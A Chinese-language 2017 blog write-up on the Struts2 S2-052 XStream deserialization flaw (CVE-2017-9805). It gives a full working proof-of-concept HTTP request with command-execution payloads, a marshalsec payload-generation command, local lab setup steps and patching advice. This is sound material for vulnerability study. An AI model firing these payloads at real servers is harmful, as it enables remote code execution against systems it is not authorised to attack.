struts2-052漏洞

From small beginnings comes great things
伟大始于渺小

  今年struts2疯了,被爆出了很多高危漏洞,之前我研究过s_045、s_046漏洞,近期又出现了s_052漏洞。s_052漏洞危害稍微小一些,因为利用环境比较苛刻,需要使用Struts2 REST插件的XStream组件。

免责申明:文章中的工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负

s2-052漏洞介绍

s2-052漏洞是当用户使用带有XStream组件的Struts-REST插件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,可直接在数据包中插入恶意代码。

漏洞编号:CVE-2017-9805(S2-052)
漏洞影响:Struts2.5 – Struts2.5.12版本。

s2-052 poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>

注意:执行命令的地方在于command内,这里是针对mac下的弹出计算器,如果是windows可改成calc.exe

1
2
3
4
5
<command>
<string>
/Applications/Calculator.app/Contents/MacOS/Calculator
</string>
</command>

s2-052漏洞复现

mac install tomcat

在安装tomcat前,先检测一下mac上有没有安装java,可以运行java -version。

1
2
3
java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)

前往tomcat官网下载:http://tomcat.apache.org/download-80.cgi?from_33lc.com 选择下载Core下的tar.gz包到本地,然后解压。
将解压后到文件夹移动到/Library目录下,并命名为Tomcat;然后设置权限:

1
sudo chmod 755 /Library/Tomcat/bin/*.sh

进入/Library/Tomcat/bin/目录,运行启动tomcat

1
sudo sh startup.sh

访问:http://127.0.0.1:8080
注意:若要修改tomcat端口,可打开/Library/Tomcat/conf/server.xml文件,修改8080端口。

编写启动关闭tomcat脚本:
将以下内容写入tomcat文件中(自己创建)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash
case $1 in
start)
sh /Library/Tomcat/bin/startup.sh
;;
stop)
sh /Library/Tomcat/bin/shutdown.sh
;;
restart)
sh /Library/Tomcat/bin/shutdown.sh
sh /Library/Tomcat/bin/startup.sh
;;
*)
echo “Usage: start|stop|restart”
;;
esac
exit 0

赋予文件权限:

1
chmod 777 tomcat

添加环境变量:

1
export PATH="$PATH:/Library/Tomcat/bin"

然后运行启动关闭tomcat:

1
2
sudo tomcat start
sudo tomcat stop

注:linux、windows安装tomcat方法都与之类似,这里不再演示。

下载部署存在漏洞的struts2版本

从struts2的官网下载最后受影响的版本struts-2.5.12解压后,将apps目录下的struts2-rest-showcase.war文件放到webapps目录下(/Library/Tomcat/webapps)重启tomcat后访问:http://127.0.0.1:8080/struts2-rest-showcase/


由于burpsuite监控的端口也是8080,所以我将tomcat的端口改成8081了。

构造post包

可以直接使用上面的poc发包,也可以自己抓取数据包重放,自己抓取的方式是点击页面上的编辑,然后点击submit提交,抓取post包,再修改post的body字段为此漏洞的poc。

尝试不同的poc

网上使用最多的poc是弹出一个计算器,然而我在mac上测试发现弹出计算器失败了,因此换了一个写文件的poc,发现测试成功。

写文件poc:(会在/tmp/下生成vuln文件)

1
<command><string>/usr/bin/touch</string><string>/tmp/vuln</string> </command>

弹计算器poc

1
2
3
4
5
Mac:
<command><string>/Applications/Calculator.app/Contents/MacOS/Calculator</string></command>
windows:
<command><string>clac.exe</string></command>

poc生成

1
java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO calc.exe > poc.txt

marshalsec-0.0.1-SNAPSHOT-all.jar网上可以下载,这里不给出地址了,自行搜索。

修补方法

  • 升级Struts到2.5.13最新版本。
  • 在不使用时删除Struts REST插件,或仅限于服务器普通页面和JSONs

python验证脚本

https://github.com/ysrc/xunfeng/commit/f9ae69fe176c8bca622831e126cd94414ebe26f6?from=timeline&isappinstalled=0

参考文章

http://www.freebuf.com/vuls/146718.html
https://www.t00ls.net/thread-41942-1-1.html
http://www.imooc.com/article/6453
https://github.com/jas502n/St2-052/blob/master/README.md

传送门

struts2-046漏洞
struts2_045漏洞
struts2漏洞poc汇总

本文标题:struts2-052漏洞

文章作者:nMask

发布时间:2017年09月06日 - 16:09

最后更新:2017年09月06日 - 19:09

原始链接:http://thief.one/2017/09/06/1/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nMask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!